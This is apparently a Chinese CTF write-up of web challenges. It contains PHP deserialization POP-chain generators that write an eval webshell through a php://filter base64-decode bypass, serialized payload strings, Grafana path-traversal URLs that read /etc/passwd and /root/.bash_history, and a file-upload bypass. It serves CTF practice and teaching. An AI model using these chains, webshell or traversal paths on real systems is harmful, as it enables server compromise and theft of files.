首届“天权信安&catf1ag”网络安全联合公开赛wp-部分Web


WEB

POP

  • php反序列
<?php 
// Challenge class. Its only behaviour is the __wakeup() gadget below. The public
// properties are filled directly from the serialized payload (the request body is
// unserialized at the bottom of this file), so both $hzy and $arr are under the
// sender's control by the time __wakeup() runs.
class catf1ag1{
    // Object whose properties __wakeup() reads; nothing in this file type-checks it.
    public $hzy;
    // Iterated in __wakeup(); each value is used as a property *name* on $hzy.
    public $arr;

    // Prints this file's source (the "no POST body" path at the bottom calls it).
    function show(){
        show_source(__FILE__);
    }

    // Runs automatically right after unserialize() rebuilds the object.
    // Reading $this->hzy->$v with a sender-chosen $v is the pivot: when $hzy is an
    // object that does not declare that property, PHP routes the read to that
    // object's __get(), which is exactly what catf1ag2 defines below.
    // The mitigation sits upstream: do not unserialize() client data at all
    // (or at minimum pass ['allowed_classes' => false]).
    function __wakeup(){
        foreach($this->arr as $k => $v){
            echo $this->hzy->$v;
            echo "</br>hzy是社么鬼???";
        }

    }
}

// Second challenge class; reached from catf1ag1::__wakeup() through __get().
class catf1ag2{
    // Destination path for file_put_contents() in pputut(); attacker-controlled
    // once the object arrives through unserialize().
    public $file;
    // Appended after the die() stub and written to $file.
    public $txt = '';

    // Magic getter: only the property name 'pputut' does anything; every other
    // name is echoed back HTML-escaped. (== is a loose comparison; === is the
    // strict form, though for two strings it makes no difference here.)
    function __get($key){
        if($key == 'pputut'){
            return $this->pputut();
        }else{
            return '<p>'.htmlspecialchars($key).'</p>';
        }
    }

    // Writes the die('stupid') stub followed by $txt to $file and returns the
    // escaped content. The deny-list below is the weak point: it rejects only
    // "../" and a backslash, so any path that is not a plain relative traversal —
    // in particular a stream-wrapper URL such as the php://filter one used in the
    // writeup's payload — is accepted, and a *write* filter can transform the
    // content (stub included) before it reaches disk.
    // A defensive version would allow-list the target directory (realpath of the
    // resolved path must stay under it), reject anything containing "://", and
    // not take the destination from deserialized data in the first place.
    function pputut(){
        if( strpos($this->file,'../') !== false ||
            strpos($this->file,'\\') !== false
        ) die();

        $content = '<?php die(\'stupid\'); ?>';
        echo "NICE!!!,来自wsy赠送的小红花</br>";
        $content .= $this->txt;
        file_put_contents($this->file, $content);
        return htmlspecialchars($content);

    }

}

// Entry point. Any POST body goes straight into unserialize(); that is the root
// cause of the whole chain (object type and every property come from the client).
// Without a POST body the file just prints its own source.
if(!empty($_POST)){
    // $_POST['giao'] is read without an isset() check; with the key missing this
    // effectively unserializes an empty string (result false) under a warning.
    $hzy = base64_decode($_POST['giao']);
    // Hardening: unserialize($hzy, ['allowed_classes' => false]) would keep
    // objects (and so __wakeup/__get) from being instantiated; a plain data
    // format such as JSON is the real fix.
    $instance = unserialize($hzy);
}else{
    $a = new catf1ag1();
    $a->show();
}

参考p牛的谈一谈php://filter的妙用

利用base64在解码的过程中，字符<、?、;、>、空格等一共有7个字符不符合base64编码的字符范围，会被忽略，所以最终被解码的字符仅有“phpdiestupid”和我们传入的其他字符。

因为phpdiestupid刚好12个字符（4的整数倍），所以不用再给它凑字符。

poc:

<?php
// Payload generator from the writeup: a catf1ag1 whose properties are pre-set so
// that, once the challenge unserializes it, __wakeup() reads $hzy->pputut and
// lands in catf1ag2::__get() / pputut(). The classes here only need matching
// names and public properties — serialize() stores data, not method bodies.
class catf1ag1{
    public $hzy;
    public $arr;
    function __construct(){
        // The object that receives the property read in the target's __wakeup().
        $this->hzy=new catf1ag2();
        // The property name the target's __get() maps to pputut().
        $this->arr=array('pputut');
    }
}

// Payload half that the target's pputut() consumes.
class catf1ag2
{
    public $file;
    public $txt;
    function __construct(){
        // A stream-wrapper path: it contains neither "../" nor a backslash, so it
        // passes the target's deny-list; the write filter base64-decodes whatever
        // is written, which is how the die() stub prefix is neutralised (the prose
        // above explains which stub characters drop out).
        $this->file='php://filter/write=convert.base64-decode/resource=shell.php';
        // Base64 content that survives the decode step.
        $this->txt='PD9waHAgZXZhbCAoJF9QT1NUWzFdKTs/Pg==';
    }
}
// Emits the base64-wrapped serialized chain in the form the target's "giao" POST
// field expects; the line below is the value the author obtained.
echo base64_encode(serialize(new catf1ag1()));
#Tzo4OiJjYXRmMWFnMSI6Mjp7czozOiJoenkiO086ODoiY2F0ZjFhZzIiOjI6e3M6NDoiZmlsZSI7czo1OToicGhwOi8vZmlsdGVyL3dyaXRlPWNvbnZlcnQuYmFzZTY0LWRlY29kZS9yZXNvdXJjZT1zaGVsbC5waHAiO3M6MzoidHh0IjtzOjM2OiJQRDl3YUhBZ1pYWmhiQ0FvSkY5UVQxTlVXekZkS1RzL1BnPT0iO31zOjM6ImFyciI7YToxOntpOjA7czo2OiJwcHV0dXQiO319

然后连接shell.php的木马

ezlogin

跟上面一样的考点

扫出imdex.php,根据题目使用一次16进制,两次base64编码去包含source.php得到源码

<?php
// error_reporting(0) hides every warning and notice (including the undefined-index
// one from the $_GET read further down); highlight_file() prints this source to
// the visitor, which is how the writeup obtained it.
error_reporting(0);
highlight_file(__FILE__);

// Gadget entry. Echoing an A (see `echo $IO = unserialize($cmd)` below) triggers
// __toString(), which calls ->world() on whatever $hello holds. __construct() is
// not run by unserialize(), so the harmless `new C` default only applies to
// objects this script creates itself; a deserialized A carries whatever $hello
// the payload set.
class A{
    public $hello;
    public function __construct(){
        $this->hello = new C;
    }
    // NOTE(review): if $hello is a B, world() returns nothing, so on PHP 8 this
    // presumably ends in a return-type Error — but only after B::world() has
    // already written the file.
    public function __toString(){
        if (isset($this->hello)){
            return $this->hello->world();
        }else{
            return "Are you ok? Small dog";
        }
    }
}
// Sink. world() writes a die() stub plus $text to $file with no validation at
// all — not even the "../" check the previous challenge had. Both the path and
// the content come from the serialized payload.
class B{
    public $file;
    public $text;
    public function __construct($file='',$text='') {
        $this -> file = $file;
        $this -> text = $text;

    }
    // A defensive version would resolve $file with realpath() against an
    // allow-listed directory, reject stream wrappers ("://"), and never take
    // either value from unserialize()d input.
    public function world(){
        $d = '<?php die("886");?>';
        $a= $d. $this->text;
        file_put_contents($this-> file,$a);
    }
}
// The intended, harmless target of A::__toString(): just returns a greeting.
class C{
    public function world(){
        return "Hello,world!";
    }
}

// Entry point. The "cmd" query parameter is unserialized as-is and then echoed,
// which is what fires A::__toString(). isset($cmd) is checked only after the
// assignment, so a missing parameter still raises the undefined-index warning
// (hidden by error_reporting(0)) and then takes the else branch.
$cmd=$_GET['cmd'];
if(isset($cmd)){
    // Hardening: unserialize($cmd, ['allowed_classes' => false]) or a non-object
    // format; the echo is only dangerous because objects can be reconstructed.
    echo $IO = unserialize($cmd);
}
else{
    echo "where is your chain?";
}
?> where is your chain?

因为phpdie886只有9个字符，所以要给它再加3个字符，凑成4的整数倍。

payload:

<?php
// Copied over from the challenge's header; neither line affects the payload.
error_reporting(0);
highlight_file(__FILE__);

// Payload generator from the writeup; mirrors only the target's class names and
// public properties. $hello is a B here instead of the harmless C.
class A{
    public $hello;
    public function __construct(){
        $this->hello = new B;
    }
}
// Payload half consumed by the target's B::world().
class B{
    public $file;
    public $text;
    public function __construct() {
        // php://filter write chain: the target has no path check at all, and the
        // base64-decode filter strips the die() stub as explained in the prose.
        $this -> file = 'php://filter/write=convert.base64-decode/resource=shell.php';
        // The leading 'aaa' pads "phpdie886" (9 chars) to a multiple of 4 so the
        // decoder stays aligned (see the note above this listing).
        $this -> text = 'aaaPD9waHAgZXZhbCAoJF9QT1NUWzFdKTs/Pg==';

    }

}
// Emits the serialized chain. Unlike the first challenge this target reads the
// raw serialized string from the "cmd" query parameter, with no base64 wrapping.
echo serialize(new A);
#O:1:"A":1:{s:5:"hello";O:1:"B":2:{s:4:"file";s:59:"php://filter/write=convert.base64-decode/resource=shell.php";s:4:"text";s:39:"aaaPD9waHAgZXZhbCAoJF9QT1NUWzFdKTs/Pg==";}}

然后连接/surprise/shell.php的一句话木马

history

  • grafana任意文件读取

题目描述:

hacker入侵服务器之后没有做好痕迹清理,你能找到hacker的痕迹吗

利用以下poc来任意文件读取

/public/plugins/alertlist/#/../../../../../../../../../../../etc/passwd

然后根据提示来查看.bash_history文件

/public/plugins/alertlist/#/../../../../../../../../../../../root/.bash_history

发现了flag

image-20221209181008193

然后读取flag,这里flag的名字为f1ag

/public/plugins/alertlist/#/../../../../../../../../../../../home/grafana/f1ag

fileupload

  • 文件上传

如果直接上传，后端会自动在文件名前加上*****（没有爆破出来）；但把Content-Type改为application/octet-stream后再上传，就不会加上这个前缀。

不能传php结尾的,要传.jpg结尾的,不然没有权限访问,但是题目环境居然可以解析这个jpg文件(?

image-20221209181540259

然后在uploads/1.jpg得到flag
